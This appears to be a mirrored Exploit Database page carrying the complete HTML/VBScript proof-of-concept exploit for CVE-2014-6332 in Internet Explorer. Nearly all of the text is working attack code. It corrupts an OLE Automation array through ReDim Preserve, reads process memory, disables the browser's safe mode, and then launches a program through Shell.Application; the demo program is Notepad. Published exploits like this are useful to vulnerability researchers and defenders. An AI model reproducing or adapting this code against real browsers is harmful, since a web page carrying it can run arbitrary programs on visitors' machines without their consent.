Microsoft Internet Explorer 11 – OLE Automation Array Remote Code Execution (1)

• Exploit Database
• 10 阅读

• 作者： yuange
  日期： 2014-11-13
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35229/

• //*
   allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
   cve-2014-6332 exploit
   https://twitter.com/yuange75
   http://hi.baidu.com/yuange1975
  
  *//
  
  <!doctype html>
  <html>
  <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
  <head>
  </head>
  <body>
  
  <SCRIPT LANGUAGE="VBScript">
  
  function runmumaa() 
  On Error Resume Next
  set shell=createobject("Shell.Application")
  shell.ShellExecute "notepad.exe"
  end function
  
  </script>
  
  <SCRIPT LANGUAGE="VBScript">
   
  dim aa()
  dim ab()
  dim a0
  dim a1
  dim a2
  dim a3
  dim win9x
  dim intVersion
  dim rnda
  dim funclass
  dim myarray
  
  Begin()
  
  function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  
  if(instr(info,"Win64")>0) then
   exit function
  end if
  
  if (instr(info,"MSIE")>0) then 
   intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
  else
   exit function
   
  end if
  
  win9x=0
  
  BeginInit()
  If Create()=True Then
   myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
   myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  
   if(intVersion<4) then
   document.write("<br> IE")
   document.write(intVersion)
   runshellcode()
   else
  setnotsafemode()
   end if
  end if
  end function
  
  function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
  end function
  
  function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
  If Over()=True Then
  ' document.write(i) 
   Create=True
   Exit For
  End If 
  Next
  end function
  
  sub testaa()
  end sub
  
  function mydata()
  On Error Resume Next
   i=testaa
   i=null
   redimPreserve aa(a2)
  
   ab(0)=0
   aa(a1)=i
   ab(0)=6.36598737437801E-314
  
   aa(a1+2)=myarray
   ab(2)=1.74088534731324E-310
   mydata=aa(a1)
   redimPreserve aa(a0)
  end function 
  
  
  function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)
  for k=0 to &h60 step 4
  j=readmemo(i+&h120+k)
  if(j=14) then
  j=0
  redimPreserve aa(a2) 
   aa(a1+2)(i+&h11c+k)=ab(4)
  redimPreserve aa(a0)
  
   j=0 
  j=readmemo(i+&h120+k) 
   
   Exit for
   end if
  
  next 
  ab(2)=1.69759663316747E-313
  runmumaa() 
  end function
  
  function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000
  
  redimPreserve aa(a0) 
  redim ab(a0) 
  
  redimPreserve aa(a2)
  
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  
  If(IsObject(aa(a1-1)) = False) Then
   if(intVersion<4) then
   mem=cint(a0+1)*16 
   j=vartype(aa(a1-1))
   if((j=mem+4) or (j*8=mem+8)) then
  if(vartype(aa(a1-1))<>0)Then
   If(IsObject(aa(a1)) = False ) Then 
   type1=VarType(aa(a1))
   end if 
  end if
   else
   redimPreserve aa(a0)
   exitfunction
  
   end if 
  else
   if(vartype(aa(a1-1))<>0)Then
  If(IsObject(aa(a1)) = False ) Then
  type1=VarType(aa(a1))
  end if 
  end if
  end if
  end if
  
  
  If(type1=&h2f66) Then 
  Over=True
  End If
  If(type1=&hB9AD) Then
  Over=True
  win9x=1
  End If
  
  redimPreserve aa(a0)
  
  end function
  
  function ReadMemo(add) 
  On Error Resume Next
  redimPreserve aa(a2)
  
  ab(0)=0 
  aa(a1)=add+4 
  ab(0)=1.69759663316747E-313 
  ReadMemo=lenb(aa(a1))
   
  ab(0)=0
   
  redimPreserve aa(a0)
  end function
  
  </script>
  
  </body>
  </html>